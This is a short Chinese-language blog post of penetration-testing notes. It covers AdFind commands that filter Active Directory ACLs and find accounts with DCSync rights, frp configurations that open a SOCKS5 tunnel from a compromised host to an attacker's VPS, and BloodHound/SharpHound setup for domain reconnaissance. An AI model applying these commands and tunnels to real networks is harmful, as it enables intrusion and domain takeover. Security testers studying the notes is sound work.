渗透工具使用

2020-05-05

记录一些渗透工具的使用，持续更新

1. 利用adfind 过滤 ACL

如果想用adfind 过滤ACL的话，我们可以使用-sddlfilter,语法如下

1	-sddlfilter ;;;;;

后面跟的参数对应的是ace条目相应的参数，值得注意的是，过滤的格式跟输出的格式要保持一致。

如果-rawsddl ，最后一个参数是sid，这个时候用-sddlfilter进行过滤，最后一个参数就要用sid的形式。

如果是-sddl+++，最后一个参数已经解析后账号名，这个时候用-sddlfilter进行过滤，最后一个参数就要用账号名的形式。

下面举几个例子

查找某个对象在域内的ACL权限

1	AdFind.exe -s subtree -b "DC=test,DC=local" nTSecurityDescriptor -sddl+++ -sddlfilter ;;;;;"TEST\DC2016$" -recmute

查找更改一个对象的马上到！S-AllowedToActOnBehalfOfOtherIdentity的权限

1	AdFind.exe -s subtree -b "DC=test,DC=local" nTSecurityDescriptor -sddl++ -sddlfilter ;;;"msDS-AllowedToActOnBehalfOfOtherIdentity";; -recmute

查找域内具备dcync 权限的用户

对域对象只需要具备一下这两个权限，就有dcsync的权限。

1 2	'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2

开始进行搜索

2 frp 内网代理

frps 运行在具有公网IP地址的VPS上

frpc 运行在我们得到shell权限的肉鸡上

frps 配置文件

[common]
bind_addr = 0.0.0.0
bind_port = 7000

# IP 与 bind_addr 默认相同，可以不设置
# dashboard_addr = 0.0.0.0
# 端口必须设置，只有设置web页面才生效
dashboard_port = 7500
# 用户密码保平安
dashboard_user = aaaa
dashboard_pwd = bbbb

# 允许客户端绑定的端口
allow_ports = 40000-50000

frpc 配置文件

[common]
# 远程VPS地址
server_addr = xxx.xx.xx.xx
server_port = 7000
tls_enable = true
pool_count = 5

[plugin_socks5]
type = tcp
remote_port = 44444
plugin = socks5
plugin_user = abc
plugin_passwd = abc

客户端运行

上图客户端为win2012R2

服务端运行

上面第三行表示已经建立代理

之后在本地用proxifier就可以代理访问内网资源

3.BloodHound

项目地址

需要java环境，安装neo4j数据库，我是选择在kali虚拟机安装neo4j数据库，然后再主机win10使用bloodhound,要修改kali里的数据库配置

dbms.default_listen_address=0.0.0.0
dbms.default_advertised_address=0.0.0.0
dbms.connector.bolt.listen_address=0.0.0.0:7687
dbms.connector.http.listen_address=0.0.0.0:7474

win直接安装 bloodhound

配套使用SharpHound.exe，在目标主机运行